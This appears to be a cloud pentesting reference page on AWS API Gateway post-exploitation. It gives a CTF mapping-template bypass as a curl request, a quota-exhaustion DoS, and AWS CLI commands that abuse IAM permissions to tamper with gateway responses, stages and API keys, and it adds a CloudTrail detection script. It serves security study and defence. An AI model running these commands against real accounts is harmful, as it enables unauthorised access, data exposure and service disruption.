AWS - API Gateway Post Exploitation


API Gateway

For more information check:

AWS - API Gateway Enum

Accessing unexposed (private) APIs

You can create a VPC endpoint at https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint for the service com.amazonaws.us-east-1.execute-api, which places the endpoint inside a network you have access to (for example through an EC2 instance), and attach a security group that allows all connections. From the EC2 instance you can then reach the endpoint and therefore invoke a private API Gateway API that was not reachable before. Two checks before relying on this: a private REST API is only invocable if its resource policy allows the call (typically a condition on aws:SourceVpce or aws:SourceVpc), so an API whose policy pins a different endpoint ID will answer 403; and unless private DNS is enabled on the endpoint, you must call through the endpoint's DNS name with a Host header of {api-id}.execute-api.{region}.amazonaws.com, or use the {api-id}-{vpce-id}.execute-api.{region}.amazonaws.com hostname.

Bypassing request body passthrough

This technique was found in this CTF writeup.

As described in the AWS docs in the PassthroughBehavior section, the default value WHEN_NO_MATCH means that when the request's Content-Type header does not match any of the configured mapping templates, the request body is passed through to the backend without any transformation.

So, in the CTF, the API Gateway had an integration request template that prevented the flag from leaking in the response when the request was sent with Content-Type: application/json:

RequestTemplates:
application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'

However, sending the request with Content-Type: text/json (or any other media type that has no mapping template) skipped the template entirely, so the attacker-supplied body reached DynamoDB unfiltered. Note that this only works while passthroughBehavior is WHEN_NO_MATCH; with NEVER (or WHEN_NO_TEMPLATES when templates exist) API Gateway rejects unmapped content types with a 415 Unsupported Media Type.

Finally, since the API Gateway only allowed GET and OPTIONS, it was possible to send an arbitrary DynamoDB query without restrictions by sending a POST request with the query in the body and the header X-HTTP-Method-Override: GET:

curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json'  --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'
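The following is an added example, not code from the CTF writeup or from AWS: a small Python model of how a REST API integration request picks a mapping template under each passthroughBehavior value, with the CTF's application/json template re-created (minus the VTL $util.escapeJavaScript call) and the attacker's filter-less Query as the body. It is a hypothetical simulation, the function and constant names are assumptions, and Content-Type matching is done on the exact header value; it shows that text/json reaches the backend untouched under WHEN_NO_MATCH and is rejected with 415 once the behaviour is NEVER.

```python
import json
from typing import Callable, Dict, Optional, Tuple

# Hypothetical model (not AWS code) of how a REST API integration request
# chooses a mapping template. The three passthroughBehavior values follow
# the AWS docs:
#   WHEN_NO_MATCH     unmapped Content-Type -> body passed through unchanged
#   WHEN_NO_TEMPLATES passthrough only when no templates are defined at all,
#                     otherwise unmapped Content-Type -> 415
#   NEVER             unmapped Content-Type -> 415
# Matching is done on the exact Content-Type value here (assumption).
Template = Callable[[Dict[str, str], str], str]  # (path params, raw body) -> integration body


def integration_request(templates: Dict[str, Template], passthrough: str,
                        content_type: Optional[str], path_params: Dict[str, str],
                        body: str) -> Tuple[int, str]:
    """Return (status, body) as seen by the backend, or (415, error) if rejected."""
    if content_type in templates:
        return 200, templates[content_type](path_params, body)
    if passthrough == "WHEN_NO_MATCH":
        return 200, body
    if passthrough == "WHEN_NO_TEMPLATES" and not templates:
        return 200, body
    return 415, json.dumps({"message": "Unsupported Media Type"})


def movies_template(params: Dict[str, str], _body: str) -> str:
    """Re-creation of the CTF's application/json template (the VTL
    $util.escapeJavaScript call is omitted). The FilterExpression is what
    keeps rows containing the flag string out of the response."""
    return json.dumps({
        "TableName": "Movies",
        "IndexName": "MovieName-Index",
        "KeyConditionExpression": "moviename=:moviename",
        "FilterExpression": "not contains(#description, :flagstring)",
        "ExpressionAttributeNames": {"#description": "description"},
        "ExpressionAttributeValues": {
            ":moviename": {"S": params["moviename"]},
            ":flagstring": {"S": "midnight"},
        },
    })


CTF_TEMPLATES: Dict[str, Template] = {"application/json": movies_template}

# Attacker-supplied body: the same Query, minus the FilterExpression.
ATTACKER_QUERY = json.dumps({
    "TableName": "Movies",
    "IndexName": "MovieName-Index",
    "KeyConditionExpression": "moviename = :moviename",
    "ExpressionAttributeValues": {":moviename": {"S": "hackers"}},
})


def send(passthrough: str, content_type: str) -> Tuple[int, bool]:
    """Simulate one request; returns (status, flag_filter_still_present)."""
    status, body = integration_request(CTF_TEMPLATES, passthrough, content_type,
                                       {"moviename": "hackers"}, ATTACKER_QUERY)
    filtered = status == 200 and "FilterExpression" in json.loads(body)
    return status, filtered


if __name__ == "__main__":
    for behaviour in ("WHEN_NO_MATCH", "WHEN_NO_TEMPLATES", "NEVER"):
        for ctype in ("application/json", "text/json"):
            print(behaviour, ctype, send(behaviour, ctype))
```

Running the block prints one line per (behaviour, Content-Type) pair; the (200, False) result for WHEN_NO_MATCH with text/json is the bypass, and the 415 results are what the hardened configuration returns. The same model applies to any integration that relies on a request template as a security control, not only the DynamoDB case from the CTF.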

Usage Plans DoS

In the Enumeration section you can see how to obtain the usage plan associated with an API key. If you have the key and it is limited to X requests per month, you can simply burn through that quota and cause a DoS for the legitimate users of the key.

The API key only needs to be included in an HTTP header called x-api-key. Once the quota is exhausted, API Gateway answers 429 with {"message":"Limit Exceeded"}; a 429 with "Too Many Requests" instead means you hit the plan's rate/burst throttle, which only slows the loop down rather than locking the key out.

apigateway:UpdateGatewayResponse, apigateway:CreateDeployment

An attacker with the permissions apigateway:UpdateGatewayResponse and apigateway:CreateDeployment can modify an existing Gateway Response (the responses API Gateway itself returns for errors such as 4XX/5XX) to include custom headers or response templates that leak sensitive information or inject malicious scripts into error pages.

API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"

# Update the Gateway Response. The patch operations are passed as JSON because the
# template value contains commas, which break the key=value shorthand syntax.
# responseTemplates sets the response body; to add a header instead, patch
# /responseParameters/gatewayresponse.header.<Name> with a quoted static value.
aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE \
  --patch-operations '[{"op":"replace","path":"/responseTemplates/application~1json","value":"{\"message\":\"$context.error.message\",\"malicious_header\":\"malicious_value\"}"}]'

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Leak of sensitive information, execution of malicious scripts, or unauthorized access to API resources.

Needs testing

apigateway:UpdateStage, apigateway:CreateDeployment

An attacker with the permissions apigateway:UpdateStage and apigateway:CreateDeployment can modify an existing API Gateway stage, for example by changing stage variables that integrations reference (redirecting traffic to a backend the attacker controls) or by changing the cache settings, to gain unauthorized access to cached data or interfere with API traffic.

API_ID="your-api-id"
STAGE_NAME="Prod"

# Update the API Gateway stage (each patch operation is a separate shorthand argument).
# Stage settings such as caching and stage variables take effect immediately.
aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME \
  --patch-operations op=replace,path=/cacheClusterEnabled,value=true op=replace,path=/cacheClusterSize,value=0.5

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Unauthorized access to cached data, disruption or interception of API traffic.

Needs testing

apigateway:PutMethodResponse, apigateway:CreateDeployment

An attacker with the permissions apigateway:PutMethodResponse and apigateway:CreateDeployment can modify the method responses of an existing API Gateway REST API to declare custom headers or response models that leak sensitive information or inject malicious scripts. Note that a method response only declares which headers may be returned; the actual header value is set in the matching integration response (put-integration-response with a method.response.header.<Name> mapping), so that permission is usually needed too.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
STATUS_CODE="200"

# Update the method response
aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Leak of sensitive information, execution of malicious scripts, or unauthorized access to API resources.

Needs testing

apigateway:UpdateRestApi, apigateway:CreateDeployment

An attacker with the permissions apigateway:UpdateRestApi and apigateway:CreateDeployment can modify the configuration of an existing API Gateway REST API, for example changing where API keys are read from (apiKeySource), replacing the resource policy (/policy), or re-enabling the default execute-api endpoint (disableExecuteApiEndpoint), which could weaken the security of the API. Note that logging is configured per stage (UpdateStage) and the minimum TLS version is a custom domain name setting (securityPolicy, via UpdateDomainName), not REST API properties.

API_ID="your-api-id"

# Update the REST API settings: take API keys from the authorizer instead of the
# x-api-key header, and make sure the default execute-api endpoint is reachable
aws apigateway update-rest-api --rest-api-id $API_ID \
  --patch-operations op=replace,path=/apiKeySource,value=AUTHORIZER op=replace,path=/disableExecuteApiEndpoint,value=false

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Weakened API security, allowing unauthorized access or exposure of sensitive information.

Needs testing

apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, apigateway:CreateUsagePlanKey

An attacker with the permissions apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, and apigateway:CreateUsagePlanKey can create new API keys, associate them with usage plans that cover the target API stages, and then use those keys for unauthorized access to APIs that require an API key.

API_ID="your-api-id"

# Create a new API key (the key value to put in x-api-key is the "value" field of this response)
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')

# Create a new usage plan covering the target API stage; a key only works for
# stages included in one of its usage plans, otherwise the request gets a 403
USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --api-stages apiId=$API_ID,stage=Prod --output text --query 'id')

# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY

Potential Impact: Unauthorized access to API resources, bypassing security controls.

Needs testing
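All of the permission abuses above share one shape: a control-plane change to a REST API followed by CreateDeployment to publish it (stage changes are the exception and apply immediately). The following is an added example, not part of the original page or of any AWS tooling: a Python detector that correlates CloudTrail-style records per restApiId and flags that pattern, run over constructed sample events. The sample records, the function names and the 30-minute window are assumptions; the field names (eventSource, eventName, userIdentity.arn, requestParameters.restApiId) follow the CloudTrail record format for API Gateway control-plane calls.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List

# Control-plane calls that change what a REST API serves but only take effect
# once CreateDeployment publishes them to a stage.
DEPLOY_GATED = {"UpdateGatewayResponse", "PutMethodResponse",
                "PutIntegrationResponse", "UpdateRestApi"}
# Stage settings (cache, stage variables, logging) apply immediately,
# so UpdateStage is reported on its own.
IMMEDIATE = {"UpdateStage"}
WINDOW = timedelta(minutes=30)  # assumed correlation window


def _ts(event: dict) -> datetime:
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _api_id(event: dict):
    return (event.get("requestParameters") or {}).get("restApiId")


def find_suspicious_deploys(events: Iterable[dict], window: timedelta = WINDOW) -> List[dict]:
    """Correlate records per restApiId: a CreateDeployment preceded, within
    `window` and by the same principal, by a deploy-gated change is one
    finding; any UpdateStage is another. Returns findings in event order."""
    by_api: Dict[str, List[dict]] = defaultdict(list)
    for ev in sorted(events, key=_ts):
        if ev.get("eventSource") == "apigateway.amazonaws.com" and _api_id(ev):
            by_api[_api_id(ev)].append(ev)

    findings = []
    for api, evs in by_api.items():
        for i, ev in enumerate(evs):
            who = ev["userIdentity"]["arn"]
            params = ev.get("requestParameters") or {}
            if ev["eventName"] in IMMEDIATE:
                findings.append({"restApiId": api, "principal": who, "stage": params.get("stageName"),
                                 "changes": [ev["eventName"]], "effectiveAt": ev["eventTime"]})
            elif ev["eventName"] == "CreateDeployment":
                prior = [p["eventName"] for p in evs[:i]
                         if p["eventName"] in DEPLOY_GATED
                         and p["userIdentity"]["arn"] == who
                         and _ts(ev) - _ts(p) <= window]
                if prior:
                    findings.append({"restApiId": api, "principal": who, "stage": params.get("stageName"),
                                     "changes": prior, "effectiveAt": ev["eventTime"]})
    return findings


# Constructed CloudTrail-style records (not real logs); only the fields the
# detector reads are included.
ATTACKER = "arn:aws:iam::111122223333:user/compromised-dev"
CI = "arn:aws:sts::111122223333:assumed-role/ci-deploy/pipeline"
SAMPLE_EVENTS = [
    {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "apigateway.amazonaws.com",
     "eventName": "GetRestApis", "userIdentity": {"arn": ATTACKER}, "requestParameters": None},
    {"eventTime": "2024-05-01T10:02:10Z", "eventSource": "apigateway.amazonaws.com",
     "eventName": "UpdateGatewayResponse", "userIdentity": {"arn": ATTACKER},
     "requestParameters": {"restApiId": "abc123", "responseType": "DEFAULT_4XX"}},
    {"eventTime": "2024-05-01T10:03:40Z", "eventSource": "apigateway.amazonaws.com",
     "eventName": "CreateDeployment", "userIdentity": {"arn": ATTACKER},
     "requestParameters": {"restApiId": "abc123", "stageName": "Prod"}},
    {"eventTime": "2024-05-01T10:10:00Z", "eventSource": "apigateway.amazonaws.com",
     "eventName": "UpdateStage", "userIdentity": {"arn": ATTACKER},
     "requestParameters": {"restApiId": "def456", "stageName": "Prod"}},
    {"eventTime": "2024-05-01T12:00:00Z", "eventSource": "apigateway.amazonaws.com",
     "eventName": "CreateDeployment", "userIdentity": {"arn": CI},
     "requestParameters": {"restApiId": "xyz789", "stageName": "Prod"}},  # routine CI deploy
]

if __name__ == "__main__":
    for finding in find_suspicious_deploys(SAMPLE_EVENTS):
        print(finding)
```

On the sample data the routine CI deployment (no preceding change) is not reported, while the UpdateGatewayResponse plus CreateDeployment pair from the same principal and the standalone UpdateStage are. In practice you would feed this from CloudTrail Lake or the S3 trail and tune the window and the set of deploy-gated event names to the actions your pipeline legitimately performs.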
